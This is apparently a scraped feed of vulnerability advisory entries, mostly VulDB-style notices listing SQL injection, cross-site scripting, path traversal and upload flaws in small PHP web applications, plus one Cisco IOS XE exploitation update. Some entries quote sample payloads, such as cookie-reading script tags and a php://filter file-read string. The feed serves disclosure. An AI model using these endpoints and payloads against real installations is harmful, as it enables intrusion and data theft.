A vulnerability classified as critical has been found in SourceCodester Employee and Visitor Gate Pass Logging System 1.0. Affected is an unknown function of the file /admin/maintenance/view_designation.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226098 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Complaint Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/userprofile.php of the component GET Parameter Handler. The manipulation of the argument uid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226097 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Campcodes Online Traffic Offense Management System 1.0. This issue affects some unknown processing of the file /admin/offenses/view_details.php. The manipulation of the argument id leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-226055.
A vulnerability classified as problematic was found in Campcodes Online Traffic Offense Management System 1.0. This vulnerability affects unknown code of the file /classes/Users.phpp. The manipulation of the argument id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-226054 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in Campcodes Online Traffic Offense Management System 1.0. This affects an unknown part of the file /admin/offenses/view_details.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226053 was assigned to this vulnerability.
A vulnerability was found in Campcodes Online Traffic Offense Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /classes/Master.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-226052.
A vulnerability was found in Campcodes Online Traffic Offense Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /classes/Login.php. The manipulation of the argument password leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-226051.
A vulnerability was found in DedeCMS 5.7.87. It has been rated as problematic. Affected by this issue is some unknown functionality of the file uploads/include/dialog/select_templets.php. The manipulation leads to path traversal: '..\filedir'. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225944.
A vulnerability was found in EyouCms up to 1.6.2. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /yxcms/index.php?r=admin/extendfield/mesedit&amp;tabid=12&amp;id=4 of the component HTTP POST Request Handler. The manipulation of the argument web_ico leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225943.
A vulnerability was found in EyouCms 1.5.4. It has been classified as problematic. Affected is an unknown function of the file login.php?m=admin&amp;c=Arctype&amp;a=edit of the component New Picture Handler. The manipulation of the argument litpic_loca leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-225942 is the identifier assigned to this vulnerability.
A vulnerability has been found in Campcodes Advanced Online Voting System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/config_save.php. The manipulation of the argument title leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225940.
A vulnerability, which was classified as critical, was found in Campcodes Advanced Online Voting System 1.0. This affects an unknown part of the file /admin/positions_delete.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225939.
A vulnerability, which was classified as critical, has been found in Campcodes Advanced Online Voting System 1.0. Affected by this issue is some unknown functionality of the file /admin/candidates_row.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-225938 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in Campcodes Advanced Online Voting System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/ballot_down.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-225937 was assigned to this vulnerability.
A vulnerability classified as critical has been found in Campcodes Advanced Online Voting System 1.0. Affected is an unknown function of the file /admin/positions_row.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225936.
A vulnerability was found in Campcodes Advanced Online Voting System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/positions_add.php. The manipulation of the argument description leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225935.
A vulnerability was found in Campcodes Advanced Online Voting System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/ballot_up.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-225934 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Advanced Online Voting System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/voters_row.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-225933 was assigned to this vulnerability.
A vulnerability was found in Campcodes Advanced Online Voting System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file login.php. The manipulation of the argument voter leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225932.
A vulnerability has been found in Control iD iDSecure 4.7.29.1 and classified as problematic. This vulnerability affects unknown code of the component Dispositivos Page. The manipulation of the argument IP-DNS leads to cross site scripting. The attack can be initiated remotely. VDB-225922 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in Control iD RHiD 23.3.19.0. This affects an unknown part of the file /v2/customerdb/operator.svc/a of the component Edit Handler. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The identifier VDB-225921 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in DataGear up to 4.7.0/5.1.0. Affected by this issue is some unknown functionality of the component JDBC Server Handler. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in novel-plus 3.6.2. Affected by this vulnerability is an unknown functionality of the file /category/list?limit=10&amp;offset=0&amp;order=desc. The manipulation of the argument sort leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225919. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in novel-plus 3.6.2. Affected is an unknown function of the file /news/list?limit=10&amp;offset=0&amp;order=desc. The manipulation of the argument sort leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-225918 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in novel-plus 3.6.2. It has been rated as critical. This issue affects some unknown processing of the file /author/list?limit=10&amp;offset=0&amp;order=desc. The manipulation of the argument sort leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-225917 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Campcodes Video Sharing Website 1.0. It has been declared as critical. This vulnerability affects unknown code of the file admin_class.php. The manipulation of the argument email leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225916.
A vulnerability was found in Campcodes Video Sharing Website 1.0. It has been classified as critical. This affects an unknown part of the file watch.php. The manipulation of the argument code leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225915.
A vulnerability was found in Campcodes Video Sharing Website 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file upload.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-225914 is the identifier assigned to this vulnerability.
A vulnerability has been found in Campcodes Video Sharing Website 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file signup.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-225913 was assigned to this vulnerability.
Cisco is providing an update for the ongoing investigation into observed exploitation of the web UI feature in Cisco IOS XE Software. We are updating the list of fixed releases and adding the Software Checker. Our investigation has determined that the actors exploited two previously unknown issues. The attacker first exploited CVE-2023-20198 to gain initial access and issued a privilege 15 command to create a local user and password combination. This allowed the user to log in with normal user access. The attacker then exploited another component of the web UI feature, leveraging the new local user to elevate privilege to root and write the implant to the file system. Cisco has assigned CVE-2023-20273 to this issue. CVE-2023-20198 has been assigned a CVSS Score of 10.0. CVE-2023-20273 has been assigned a CVSS Score of 7.2. Both of these CVEs are being tracked by CSCwh87343.
A vulnerability was found in SourceCodester Online Computer and Laptop Store 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/?page=maintenance/brand. The manipulation of the argument Brand Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225536.
A vulnerability classified as critical was found in SourceCodester Complaint Management System 1.0. This vulnerability affects unknown code of the file /users/check_availability.php of the component POST Parameter Handler. The manipulation of the argument email leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225532.
A vulnerability was found in SourceCodester Sales Tracker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/products/manage_product.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-225530 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Online Eyewear Shop 1.0. This vulnerability affects unknown code of the file /admin/inventory/manage_stock.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-225406 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in PHPGurukul Bank Locker Management System 1.0. Affected is an unknown function of the file recovery.php of the component Password Reset. The manipulation of the argument uname/mobile leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225360.
A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file index.php of the component Search. The manipulation of the argument searchinput leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225359.
A vulnerability classified as critical was found in SourceCodester Best Online News Portal 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/forgot-password.php of the component POST Parameter Handler. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-225361 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Computer and Laptop Store 1.0. It has been classified as problematic. Affected is an unknown function of the file /admin/?page=system_info. The manipulation of the argument System Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225348.
A vulnerability was found in SourceCodester Online Computer and Laptop Store 1.0 and classified as critical. This issue affects some unknown processing of the file /classes/Master.php?f=delete_category. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225347.
A vulnerability has been found in SourceCodester Online Computer and Laptop Store 1.0 and classified as critical. This vulnerability affects unknown code of the file /classes/Master.php?f=save_category. The manipulation of the argument category leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-225346 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Online Computer and Laptop Store 1.0. This affects an unknown part of the file /classes/Master.php?f=delete_sub_category. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-225345 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Online Computer and Laptop Store 1.0. Affected by this issue is some unknown functionality of the file /classes/Master.php?f=save_sub_category of the component Subcategory Handler. The manipulation of the argument sub_category leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225344.
A vulnerability classified as critical was found in SourceCodester Online Computer and Laptop Store 1.0. Affected by this vulnerability is an unknown functionality of the file /classes/Master.php?f=delete_img of the component Image Handler. The manipulation of the argument path leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225343.
A vulnerability classified as critical has been found in SourceCodester Online Computer and Laptop Store 1.0. Affected is an unknown function of the file login.php of the component User Registration. The manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-225342 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Computer and Laptop Store 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/sales/index.php. The manipulation of the argument date_start/date_end leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225340.
A vulnerability was found in SourceCodester Online Computer and Laptop Store 1.0. It has been classified as critical. This affects an unknown part of the file /?p=products of the component Product Search. The manipulation of the argument search leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225339.
A vulnerability has been found in PHPGurukul BP Monitoring Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file password-recovery.php of the component Password Recovery. The manipulation of the argument emailid/contactno leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-225337 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in PHPGurukul BP Monitoring Management System 1.0. Affected is an unknown function of the file change-password.php of the component Change Password Handler. The manipulation of the argument password leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225336.
A vulnerability, which was classified as problematic, has been found in PHPGurukul BP Monitoring Management System 1.0. This issue affects some unknown processing of the file add-family-member.php of the component Add New Family Member Handler. The manipulation of the argument Member Name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225335.
A vulnerability was found in taoCMS 3.0.2. It has been classified as critical. Affected is an unknown function of the file /admin/admin.php. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-225330 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Survey Application System 1.0 and classified as problematic. This issue affects some unknown processing of the component Add New Handler. The manipulation of the argument Title with the input &lt;script&gt;prompt(document.domain)&lt;/script&gt; leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-225329 was assigned to this vulnerability.
A vulnerability has been found in SourceCodester Online Computer and Laptop Store 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/?page=user of the component Avatar Handler. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225319.
A vulnerability, which was classified as critical, has been found in SourceCodester Simple and Beautiful Shopping Cart System 1.0. This issue affects some unknown processing of the file login.php. The manipulation of the argument username/password leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-225317 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Simple and Beautiful Shopping Cart System 1.0. This vulnerability affects unknown code of the file delete_user_query.php. The manipulation of the argument user_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225316.
A vulnerability, which was classified as problematic, was found in zhenfeng13 My-Blog. Affected is an unknown function of the file /admin/configurations/userInfo. The manipulation of the argument yourAvatar/yourName/yourEmail leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The identifier of this vulnerability is VDB-225264.
A vulnerability, which was classified as critical, was found in PHPGurukul BP Monitoring Management System 1.0. Affected is an unknown function of the file profile.php of the component User Profile Update Handler. The manipulation of the argument name/mobno leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-225318 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Simple Mobile Comparison Website 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/categories/view_category.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-225150 is the identifier assigned to this vulnerability.
A vulnerability was found in Keysight IXIA Hawkeye 3.3.16.28. It has been declared as problematic. This vulnerability affects unknown code of the file /licenses. The manipulation of the argument view with the input teste"&gt;&lt;script&gt;alert(%27c4ng4c3ir0%27)&lt;/script&gt; leads to cross site scripting. The attack can be initiated remotely. VDB-224998 is the identifier assigned to this vulnerability. NOTE: Vendor did not respond if and how they may handle this issue.
A vulnerability was found in SourceCodester Earnings and Expense Tracker App 1.0. It has been classified as problematic. This affects an unknown part of the file index.php. The manipulation of the argument page leads to information disclosure. It is possible to initiate the attack remotely. The identifier VDB-224997 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Computer and Laptop Store 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/?page=product/manage_product&amp;id=2. The manipulation of the argument Product Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224996.
A vulnerability has been found in SourceCodester Air Cargo Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/transactions/track_shipment.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224995.
A vulnerability, which was classified as problematic, was found in SourceCodester Online Graduate Tracer System 1.0. Affected is an unknown function of the file admin/. The manipulation leads to session expiration. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-224994 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in SourceCodester Online Payroll System 1.0. This issue affects some unknown processing of the file /admin/employee_edit.php. The manipulation of the argument of leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224993 was assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester Online Payroll System 1.0. This vulnerability affects unknown code of the file /admin/deduction_edit.php. The manipulation of the argument description leads to cross site scripting. The attack can be initiated remotely. The identifier of this vulnerability is VDB-224992.
A vulnerability classified as problematic has been found in SourceCodester Online Payroll System 1.0. This affects an unknown part of the file /admin/employee_add.php. The manipulation of the argument of leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224991.
A vulnerability was found in SourceCodester Online Payroll System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/login.php. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-224990 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Payroll System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/cashadvance_row.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224989 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Payroll System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/attendance_row.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224988.
A vulnerability was found in SourceCodester Online Payroll System 1.0 and classified as critical. This issue affects some unknown processing of the file attendance.php. The manipulation of the argument employee leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224987.
A vulnerability has been found in SourceCodester Online Payroll System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/deduction_row.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-224986 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Online Payroll System 1.0. This affects an unknown part of the file /admin/employee_row.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224985 was assigned to this vulnerability.
A vulnerability has been found in SourceCodester Centralized Covid Vaccination Records System 1.0 and classified as critical. This vulnerability affects unknown code of the file /vaccinated/admin/maintenance/manage_location.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-224842 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Online Computer and Laptop Store 1.0. This affects an unknown part of the file php-ocls\admin\system_info\index.php. The manipulation of the argument img leads to unrestricted upload. It is possible to initiate the attack remotely. The identifier VDB-224841 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in EyouCMS up to 1.5.4. This affects an unknown part of the file login.php. The manipulation of the argument tag_tag leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224751.
A vulnerability, which was classified as problematic, has been found in EyouCMS up to 1.5.4. Affected by this issue is some unknown functionality of the file login.php. The manipulation of the argument typename leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-224750 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in OTCMS 6.0.1. Affected by this vulnerability is an unknown functionality of the file sysCheckFile.php?mudi=sql. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224749 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in SourceCodester Employee Payslip Generator 1.0. Affected is an unknown function of the file /classes/Master.php?f=save_position of the component Create News Handler. The manipulation of the argument name with the input &lt;script&gt;alert(document.cookie)&lt;/script&gt; leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224748.
A vulnerability was found in SourceCodester Gadget Works Online Ordering System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/products/index.php of the component GET Parameter Handler. The manipulation of the argument view with the input &lt;script&gt;alert(666)&lt;/script&gt; leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224747.
A vulnerability was found in SourceCodester Police Crime Record Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/casedetails.php of the component GET Parameter Handler. The manipulation of the argument id with the input "&gt;&lt;script&gt;alert(233)&lt;/script&gt; leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-224746 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Police Crime Record Management System 1.0. It has been classified as critical. This affects an unknown part of the file /officer/assigncase.php of the component GET Parameter Handler. The manipulation of the argument caseid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224745 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Simple Mobile Comparison Website 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/fields/manage_field.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224744.
A vulnerability has been found in SourceCodester Simple Task Allocation System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file manage_user.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224743.
A vulnerability, which was classified as problematic, was found in SourceCodester Simple Task Allocation System 1.0. Affected is an unknown function of the file index.php. The manipulation of the argument page leads to information disclosure. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224724.
A vulnerability was found in SourceCodester Earnings and Expense Tracker App 1.0. It has been classified as critical. Affected is an unknown function of the file manage_user.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-224700.
A vulnerability was found in jeecg-boot 3.5.0 and classified as critical. This issue affects some unknown processing of the component API Documentation. The manipulation leads to improper authentication. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224699.
A vulnerability was found in Rockoa 2.3.2. It has been declared as critical. This vulnerability affects unknown code of the file webmainConfig.php of the component Configuration File Handler. The manipulation leads to code injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-224674 is the identifier assigned to this vulnerability.
A vulnerability was found in DataGear up to 4.5.1. It has been classified as problematic. This affects an unknown part of the component Diagram Type Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224673 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in SourceCodester Grade Point Average GPA Calculator 1.0. Affected is an unknown function of the file index.php. The manipulation of the argument page with the input php://filter/read=convert.base64-encode/resource=grade_table leads to information disclosure. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-224670 is the identifier assigned to this vulnerability.
A vulnerability has been found in IBOS up to 4.5.4 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /?r=email/api/mark&amp;op=delFromSend. The manipulation of the argument emailids leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.5.5 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-224635.
A vulnerability, which was classified as problematic, was found in Dreamer CMS up to 3.5.0. Affected is an unknown function of the component File Upload Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-224634 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in KMPlayer 4.2.2.73. This issue affects some unknown processing in the library SHFOLDER.dll. The manipulation leads to uncontrolled search path. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The identifier VDB-224633 was assigned to this vulnerability.
A vulnerability classified as critical was found in IBOS 4.5.5. This vulnerability affects unknown code of the component htaccess Handler. The manipulation leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224632.
A vulnerability classified as problematic has been found in SourceCodester Grade Point Average GPA Calculator 1.0. This affects an unknown part of the file index.php. The manipulation of the argument page leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224631.
A vulnerability was found in IBOS 4.5.5. It has been rated as critical. Affected by this issue is some unknown functionality of the file /?r=report/api/getlist of the component Report Search. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-224630 is the identifier assigned to this vulnerability.
A vulnerability was found in jeecg-boot 3.5.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file SysDictMapper.java of the component Sleep Command Handler. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224629 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Air Cargo Management System 1.0. It has been classified as critical. Affected is an unknown function of the file admin/user/manage_user.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224628.
A vulnerability was found in SourceCodester Simple and Beautiful Shopping Cart System 1.0 and classified as critical. This issue affects some unknown processing of the file upload.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224627.
A vulnerability has been found in SourceCodester Young Entrepreneur E-Negosyo System 1.0 and classified as critical. This vulnerability affects unknown code of the file index.php?q=product. The manipulation of the argument search leads to sql injection. The attack can be initiated remotely. VDB-224626 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Young Entrepreneur E-Negosyo System 1.0. This affects an unknown part of the file login.php. The manipulation of the argument U_USERNAME leads to sql injection. It is possible to initiate the attack remotely. The identifier VDB-224625 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Young Entrepreneur E-Negosyo System 1.0. Affected by this issue is some unknown functionality of the file cart/controller.php?action=add. The manipulation of the argument PROID leads to sql injection. The identifier of this vulnerability is VDB-224624.
A vulnerability classified as critical was found in SourceCodester Young Entrepreneur E-Negosyo System 1.0. Affected by this vulnerability is an unknown functionality of the file passwordrecover.php. The manipulation of the argument phonenumber leads to sql injection. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-224623.
A vulnerability classified as critical has been found in SourceCodester Young Entrepreneur E-Negosyo System 1.0. Affected is an unknown function of the file admin/products/controller.php?action=add. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. VDB-224622 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in SourceCodester Earnings and Expense Tracker App 1.0. This issue affects some unknown processing of the file LoginRegistration.php?a=register_user. The manipulation of the argument fullname leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-224309 was assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester Earnings and Expense Tracker App 1.0. This vulnerability affects unknown code of the file Master.php?a=save_earning. The manipulation of the argument name leads to cross site scripting. The attack can be initiated remotely. The identifier of this vulnerability is VDB-224308.
A vulnerability classified as problematic has been found in SourceCodester Earnings and Expense Tracker App 1.0. This affects an unknown part of the file Master.php?a=save_expense. The manipulation of the argument name leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-224307.
